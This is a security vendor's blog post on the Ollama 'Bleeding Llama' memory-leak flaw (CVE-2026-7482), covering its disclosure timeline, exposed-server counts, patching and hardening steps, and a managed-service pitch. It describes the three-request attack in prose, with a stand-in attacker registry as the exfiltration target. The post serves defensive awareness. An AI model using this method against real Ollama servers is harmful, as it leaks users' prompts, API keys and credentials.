Bleeding Llama (CVE-2026-7482): Why Self-Hosted AI Isn't Automatically Secure AI

Timo Wevelsiep

•10.05.2026

#Ollama #BleedingLlama #CVE #SelfHostedAI #LocalAI #OpenWebUI #Security #NIS2 #ShadowAI

Editorial note: The information in this article was compiled to the best of our knowledge at the time of publication. Technical details, prices, versions, licensing terms, and external content may change. Please verify the information provided independently, particularly before making business-critical or security-related decisions. This article does not replace individual professional, legal, or tax advice.

Bleeding Llama (CVE-2026-7482): Why Self-Hosted AI Isn't Automatically Secure AI

Run local AI safely — as a managed service — WZ-IT runs Ollama, OpenWebUI and friends with auth proxy, network segmentation and CVE monitoring as defaults. Patches in hours, not months — documented for NIS2. Book a kickoff call · More about CVE monitoring · Open WebUI hosting

Three unauthenticated API calls. No login, no exploit framework, no privilege escalation. Three POST requests to a default port, and the machine's memory is on its way out — with system prompts, parallel chat sessions, API keys and database credentials. An estimated 300,000 Ollama instances are reachable worldwide, 8.9 percent of them in Germany: the third-largest country for exposed Ollama servers.

CVE-2026-7482 — dubbed "Bleeding Llama" by its discoverers — is a critical memory-leak vulnerability (CVSS 9.1) in Ollama's GGUF model loader. The patch has been available since February 2026. Official CVE assignment, and therefore visibility in vulnerability scanners? Only since 1 May. Three months between patch and disclosure — and the majority of operators were entirely unaware.

This piece sorts out what happened, who is affected, what to do immediately, and which architectural lessons apply to anyone marketing local AI as a sovereignty story. The core thesis: self-hosting is the right horse for GDPR and the EU AI Act — but only if the operations layer behind it actually exists. Otherwise the sovereignty advantage flips into a security liability.

What Bleeding Llama is
How the attack works
Why around 300,000 servers are exposed
What the incident reveals about the AI ecosystem
Who in your organisation is at risk
Immediate actions for IT leads
Hardening posture for production Ollama deployments
The lesson for decision-makers
How we approach this at WZ-IT
Further reading

What Bleeding Llama is

CVE ID: CVE-2026-7482
Severity: CVSS 9.1 (critical)
Class: heap out-of-bounds read in the GGUF model loader
Authentication: none required
Complexity: three API calls
Affected versions: all Ollama releases before 0.17.1
Patch shipped: 25 February 2026 (Ollama 0.17.1)
CVE published: 1 May 2026 (Echo CNA, after three months of silence at MITRE)
Discoverer: Dor Attias / Cyera Research

At its core, Bleeding Llama is a memory-read flaw. A crafted GGUF file declares a tensor size that significantly exceeds the actual data block. While processing the file, the Ollama server in fs/ggml/gguf.go and server/quantization.go reads past the allocated heap buffer — and serves the result as part of the "converted" model. Whatever neighbouring heap memory holds at that moment ends up baked into the model artefact. A single POST /api/push to an attacker-controlled registry then exfiltrates the data.

Three properties make the bug particularly nasty:

No authentication. Ollama ships with no built-in login. Whoever can reach the port can attack.
No visible traces. No crash, no stack trace, no failed request in the logs. Only dedicated endpoint monitoring on /api/create and /api/push would catch the attack in flight.
Direct exfiltration. Heap content does not take a detour — it is written straight into the uploaded model artefact and shipped to an external endpoint. Three calls, done.

How the attack works

The exploit consists of three steps and is reproducible with vanilla curl.

Step 1 — Upload a crafted GGUF file. The attacker builds a GGUF file whose tensor header declares a size larger than the actual data block. It is uploaded via POST /api/blobs/sha256:<digest>. Ollama accepts the upload without inspecting the contents — the digest matches the declared hash, and the file format is only interpreted at processing time.

Step 2 — Trigger conversion. A POST /api/create referencing the previously uploaded file instructs Ollama to convert or quantise it into a new model. This is where the out-of-bounds read fires: the server walks the heap buffer along the fake tensor size, runs past the allocation, and packs adjacent heap memory into the output model.

Step 3 — Exfiltration via push. A POST /api/push with the converted model and a target registry like registry.attacker.com/leaked-model ships the artefact off-host. The attacker pulls their own model down from their own registry afterwards and dissects the heap content.

What typically lives in the heap:

System prompts of running models (corporate know-how, tone-of-voice instructions, safety guardrails)
Parallel chat sessions of other users (user prompts, model responses, conversation history)
Environment variables of the Ollama process — usually the killer: API keys (OpenAI, Anthropic, cloud providers), database credentials, JWT signing keys, service account tokens
Proprietary code sent for summarisation or code review
File contents that flowed through RAG pipelines
Tool outputs from agentic setups — Claude Code, LangChain, AutoGen all push everything the tool sees through the inference layer

Cyera's framing is sober: from an organisation's inference stream you essentially learn everything the organisation does. API keys, proprietary code, customer contracts, personnel data — anything that lives in prompts lives in the heap.

Why around 300,000 servers are exposed

The scale of the problem only surprises on second glance. Three structural factors make Ollama the shadow-AI platform par excellence.

Default without authentication. Ollama ships no built-in auth layer. That's pragmatic for a developer's local setup; in production it is an invitation. The official GitHub issue #11941 for a "Secure Mode" has been open for months — until then, every production setup depends on a fronting reverse proxy with authentication.

The OLLAMA_HOST=0.0.0.0 configuration trap. By default Ollama binds to 127.0.0.1 — safe, but useless for multi-user setups. Tutorials therefore recommend OLLAMA_HOST=0.0.0.0 as a quick fix, often without flagging that this also gives every other host on the network access. The official docs mention it; many third-party sources skip the warning. Result: thousands of instances directly reachable from the internet.

Shadow AI. Dev teams stand up Ollama on their own because "local AI" sells more easily internally than an OpenAI account. IT and security frequently learn about it only after an incident. Bishop Fox demonstrated in May 2026 with the open-source AIMap tool how trivially exposed AI endpoints (Ollama, vLLM, LiteLLM, OpenWebUI, MCP servers) can be discovered — and that only 13 percent of organisations have any AI-specific security controls in place at all.

The geographic distribution of exposed servers (Cisco Talos study, September 2025):

USA: 36.6 percent
China: 22.5 percent
Germany: 8.9 percent
France, the United Kingdom, the Netherlands, Japan and South Korea follow in single digits

Germany is therefore not "also a bit affected" but a top-three location worldwide. In absolute numbers, with Cyera's estimate of 300,000 instances, that translates to roughly 27,000 exposed Ollama servers with German IPs. The fact that the bug had been patched for three months and still has impact is not Ollama's fault per se — it is the disclosure vacuum.

What the incident reveals about the AI ecosystem

The CVE-assignment story is more instructive than the bug itself.

2 February 2026: Cyera privately reports the bug to Ollama.
25 February 2026: Ollama confirms, ships the fix, releases version 0.17.1 — without flagging the patch as a security fix. Release notes use routine language like "stability fixes".
2 March 2026: Cyera files the CVE request with MITRE.
26 March, 26 April: Follow-up requests to MITRE go unanswered.
28 April 2026: Cyera escalates to the alternative CVE Numbering Authority Echo, which assigns CVE-2026-7482 the same day.
1 May 2026: Public disclosure.

In practice: for three months a patch was available but invisible to the world. Vulnerability scanners typically know about vulnerabilities only via CVE IDs — no CVE, no match, no warning. Threat feeds, SIEM rules, compliance reports: all blind. Anyone without their own patch management with version tracking simply did not deploy the patch, because nobody alerted them.

The pattern is not new. 2024 — Probllama: an RCE in the same Ollama stack, found by Trend Micro. September 2025 — Cisco Talos Shodan study: more than 1,100 unauthenticated Ollama instances found in ten minutes. May 2026 — AIMap demo: more than 175,000 exposed Ollama instances plus a growing number of unprotected vLLM and LiteLLM endpoints.

The line from the Cisco Talos study that nails it: widespread neglect of fundamental security practices such as access control, authentication, and network isolation in the deployment of AI systems — often stemming from organisations rushing to adopt emerging technologies without informing IT or security teams.

The subtext: in 2026 the AI ecosystem is where webserver operations were in 1999. Open by default, normalised by tutorials, without structural security defaults. Bleeding Llama is not the first and not the last incident of this kind — it is currently the most visible.

Who in your organisation is at risk

Four profiles where the bug bites directly.

Companies with Ollama as an internal AI assistant. When employees talk to Ollama via an OpenWebUI front-end or an internal chat UI, every conversation runs through the same heap memory. An attacker with API access gets a cross-section of what the workforce is currently asking — from contract drafts to recruiting data.

Dev teams with agentic workflows. Claude Code, Continue, LangChain, AutoGen, MCP servers: all of these tools push file contents, code snippets and tool outputs through the LLM backend. With a self-hosted backend like Ollama, all of that data lands in the heap. A successful attack hands over not just API keys but source code, database schemas and customer data on top.

Regulated industries. Anyone in healthcare, finance, legal or the public sector running local AI — precisely because the cloud path doesn't fit regulatorily — has exactly the kind of data in the heap that needs the strongest protection. PII, PHI, attorney-client information, banking secrecy. A Bleeding Llama hit here is a reportable incident under GDPR Art. 33.

Local LAN instances. At risk even without direct internet exposure if other users or applications share the same network segment. A compromised office workstation in the same VLAN is enough. Network segmentation is not a nice-to-have here, it is a baseline requirement.

Quick risk indicators for IT leadership:

Is Ollama running with OLLAMA_HOST=0.0.0.0 and no fronting auth proxy?
Is port 11434 reachable from outside the server network?
Is an Ollama version below 0.17.1 in use?
Does the Ollama process environment contain secrets (typical answer: yes)?
Is there logging and monitoring on /api/create and /api/push?

Three or more hits: Bleeding Llama is a realistic actual risk, not a theoretical one.

Immediate actions for IT leads

Within 24 hours.

# Check version
ollama --version

# Update via installer
curl -fsSL https://ollama.com/install.sh | sh

# Docker stack
docker pull ollama/ollama:latest && docker compose up -d

Then verify with curl http://localhost:11434/api/version that the running instance is actually on 0.17.1 or higher. If you use a packaged version from distribution repos, check the maintainer's patch status separately — some distributions lag.

Within one week.

Asset inventory. Which hosts, containers and VMs run Ollama? Capture shadow IT pragmatically via nmap -p 11434 across the internal network.
Audit internet exposure. Use Shodan or your asset scanner of choice. Nothing on Ollama port 11434 should be reachable from the public internet.
If compromise is suspected, rotate secrets. All API keys (OpenAI, Anthropic, cloud providers), DB credentials, JWT signing keys, service tokens. Whatever sat in the Ollama process heap is potentially in foreign hands.
Front it with an auth proxy. Nginx, Caddy or Traefik with Basic Auth (minimum), better OAuth2 (via Authentik or Zitadel, for example) or mTLS for machine-to-machine setups.
Network segmentation. Ollama into its own VLAN, strict egress rules, outbound connections only to known registries.
Audit agentic integrations. Which tools (Claude Code, LangChain, MCP servers) talk to your local Ollama? Which of them have file system access? What flowed through them in the past 90 days?

Mid-term. Build out the hardening posture sketched in the next section. Bleeding Llama is not the end point but the trigger to move local AI permanently to production maturity.

Hardening posture for production Ollama deployments

Eight building blocks that any Ollama instance beyond a developer's toy should have.

1. Never 0.0.0.0 without a reverse proxy. Default is 127.0.0.1. Solve multi-user via a reverse proxy, not by opening up the bind. If 0.0.0.0 is mandatory (container setup), put an auth layer in front.

2. Reverse proxy with TLS 1.3. Nginx, Caddy or Traefik. TLS termination, HSTS, modern cipher suite. Self-signed is fine for internal setups; Let's Encrypt or your own CA for anything reachable via DNS.

3. Authentication. Ranked by effort: Basic Auth (minimum, fine for internal setups), OAuth2/OIDC via Authentik / Keycloak / Zitadel (the standard for multi-user), mTLS (for service-to-service in regulated environments).

4. Rate limiting and API gateway. limit_req in Nginx or a gateway like Kong or Tyk. Throttle /api/create and /api/push strictly — the Bleeding Llama exploit needs at most three requests per leak; a rate limit of ten requests per minute per IP makes the attack uneconomic at scale.

5. Network segmentation. Ollama in its own VLAN, firewall rules on a whitelist principle. Inbound only from the auth proxy, outbound only to defined registries. On Proxmox or Kubernetes you can steer this granularly via Proxmox SDN network policies or Kubernetes NetworkPolicy.

6. Container isolation and least privilege. Don't run Ollama as root. Dedicated ollama user with minimal permissions. Read-only container filesystem, resource limits, AppArmor or SELinux profile. No service-account tokens in environment variables — mount them as scoped secrets.

7. Egress filtering. The Bleeding Llama exploit needs an outbound connection to its push target. Strict egress rules that allow only known model registries (registry.ollama.ai, your own private registry) close the exfil path — even if the bug stays unpatched.

8. Monitoring and anomaly detection. Log every request to /api/create and /api/push, with anomaly detection on unusual push targets, unusual model sizes, unusual request frequencies. A central logging stack (Wazuh, OpenSearch, Graylog) is the difference between "would have been caught" and "ran silently for three months".

Cover all eight points and you have not only survived Bleeding Llama but built the foundation for the next vulnerability — because the next one is coming.

The lesson for decision-makers

Local AI is the right answer to a number of pressing questions — GDPR, the EU AI Act, data residency, vendor lock-in, sovereignty. But: local AI is not automatically secure AI. It is an architectural choice that shifts responsibility — from the cloud vendor to your own IT organisation.

Bleeding Llama makes that shift visible. Two years ago "local AI" was the bold call — today it is widespread, often without the operations side scaling along. The shadow-AI wave has produced instances in many companies that nobody tracks, nobody patches and nobody monitors.

Three implications for decision-makers:

Self-hosting without an operations layer is an empty promise. "We host locally" does not cut it — the question is who patches, monitors, segments and audits. If you can't answer that clearly, you have a sovereignty label without sovereignty substance. A successful Bleeding Llama hit is, in case of doubt, a notifiable incident under GDPR Art. 33 — and therefore a board-level item.

CVE monitoring is mandatory, not optional. A bug that was patched and invisible for three months is exactly the scenario systematic patch management is supposed to catch. "We read the release notes" already lost the game — the release notes did not flag the patch as a security fix. Structured CVE monitoring checks against vendor feeds even without a CVE ID and compares running versions against public patches.

NIS2 changes who owns the question. Germany's NIS2 transposition act, in force since early 2026, makes vulnerability management an explicit responsibility of management boards. On violation, leadership is personally liable — up to €10 million or two percent of global turnover, in the worst case from private assets. Anyone rolling out local AI without building the corresponding operations layer is therefore exporting a concrete liability risk upwards.

The fix is not "less local AI" but "more professionally operated local AI". Keep the GDPR win — and add the security one.

How we approach this at WZ-IT

We run local AI stacks as a managed service in three stages.

Stage 1 — architecture and stack. We build Ollama, OpenWebUI, AnythingLLM or vLLM as a hardened stack on our own infrastructure in Germany — on request inside your own Proxmox cluster, on Hetzner, netcup or on-premise. OAuth2-fronted auth proxy, TLS 1.3, network segmentation, egress filtering and container isolation are not options, they are defaults. Optionally on dedicated GPU hardware like the AI Cube or DGX Spark.

Stage 2 — CVE monitoring and patch management. Our managed operations service checks daily against NVD, CISA-KEV, OSV, BSI advisories and vendor-specific feeds. Exactly the bug that was silently patched in Bleeding Llama for three months we would have caught via version tracking against the Ollama GitHub repo — even without a CVE ID. We patch critical vulnerabilities within agreed response times, documented for NIS2 audits.

Stage 3 — compliance and reporting. Architecture documentation, defined RTO and RPO, monthly patch report to leadership, documented restore tests, audit trail for GDPR data subject requests and EU AI Act obligations. Anyone classified as a high-risk system under the EU AI Act (see our piece on the EU AI Act from August 2026) gets the necessary evidence on demand.

In practice: you give us your use cases, models and compliance constraints — we deliver the stack, run it, and make sure the next Bleeding Llama type vulnerability is a patch ticket rather than a shadow-AI scandal.

Frequently Asked Questions

Answers to important questions about this topic

A critical vulnerability (CVSS 9.1) in Ollama's GGUF model loader, published on 1 May 2026 by Cyera Research. Three unauthenticated API calls (POST /api/blobs, /api/create, /api/push) are enough to use a heap out-of-bounds read to bleed the server's memory — including system prompts, parallel chat sessions, environment variables, API keys and database credentials. Fix: update to Ollama 0.17.1 or newer.

Anything that lives in Ollama's heap memory at the moment of the attack: system prompts of running models, parallel user prompts and chat histories, the entire process environment (OpenAI and Anthropic API keys, DB credentials, JWT tokens, cloud service secrets), proprietary code that was sent to the model, plus — for agentic setups (Claude Code, LangChain) — tool outputs and file contents. Cyera describes it as effectively the entire inference stream of an organisation.

Cisco Talos analysed the geographic distribution of exposed Ollama servers in September 2025: USA 36.6 percent, China 22.5 percent, Germany 8.9 percent — the third-largest country worldwide. German companies are in the top three when it comes to publicly reachable, often unprotected Ollama instances. The shadow-AI wave has not spared the German Mittelstand.

1. Check ollama --version, update to 0.17.1 or newer. 2. Audit internet exposure — port 11434 must not be reachable publicly. 3. If compromise is suspected, rotate all secrets (API keys, DB credentials, JWT signing keys). 4. Put an authentication proxy in front (Nginx or Caddy with OAuth2 or mTLS). 5. Introduce network segmentation and enable egress filtering. 6. Monitor logs for /api/create and /api/push, enable anomaly detection.

Ollama shipped the fix in version 0.17.1 but did not flag it as a security patch. Cyera filed the CVE request with MITRE on 2 March 2026 and waited three months without a response. Only after escalating to the alternative CNA Echo did CVE-2026-7482 get assigned on 28 April. The result: vulnerability scanners did not detect the bug, threat feeds carried no entry, operators were unaware. This is the strongest possible argument for structured CVE monitoring beyond the NVD-only feed.

OpenWebUI itself is not directly affected by CVE-2026-7482. But: OpenWebUI is the standard UI for Ollama, almost always in the same network segment, often in the same container stack. If Ollama is the backend for OpenWebUI and Ollama isn't patched, every OpenWebUI conversation indirectly leaks too — they all flow through Ollama. Bishop Fox also showed in May 2026 with AIMap that OpenWebUI endpoints are increasingly exposed. OpenWebUI operators should walk the same hardening path (auth proxy, egress filtering, network segmentation).

We operate local AI stacks (Ollama, OpenWebUI, AnythingLLM, vLLM) as a managed service on our own infrastructure in Germany — with authentication proxy, network segmentation, egress filtering and container isolation as the default, not as an extra. CVE monitoring via our managed operations service checks daily against NVD, CISA-KEV and vendor-specific feeds — critical bugs are patched within hours, not weeks. Plus: documented architecture for NIS2 audits, defined RTO and RPO, and a personal contact.

Written by

Timo Wevelsiep

Co-Founder & CEO

Co-Founder of WZ-IT. Specialized in cloud infrastructure, open-source platforms and managed services for SMEs and enterprise clients worldwide.

Further Insights

Proxmox Backup Server Offsite: Pull Architecture with Asymmetric Retention for Ransomware-Safe Backups

Back to overview

Bleeding Llama (CVE-2026-7482): Why Self-Hosted AI Isn't Automatically Secure AI

Table of contents

What Bleeding Llama is

How the attack works

Why around 300,000 servers are exposed

What the incident reveals about the AI ecosystem

Who in your organisation is at risk

Immediate actions for IT leads

Hardening posture for production Ollama deployments

The lesson for decision-makers

How we approach this at WZ-IT

Further reading

Frequently Asked Questions

What exactly is Bleeding Llama (CVE-2026-7482)?

What data can actually leak?

Why is this a German topic?

What should we do immediately if we run Ollama?

Why was the bug patched in public for three months without anyone noticing?

Is OpenWebUI also affected?

How does WZ-IT help secure local AI?

Further Insights

Let's Talk About Your Idea

What is your inquiry about?

Cloud & Infrastructure (Hosting, Setup & Migration)

Custom Software Development

AI & LLM Solutions (incl. AI Servers)

IT Security & Identity Management

IoT & LoRaWAN (Sensoren, Plattformen & Netzwerke)

IT Consulting & Strategy

Something else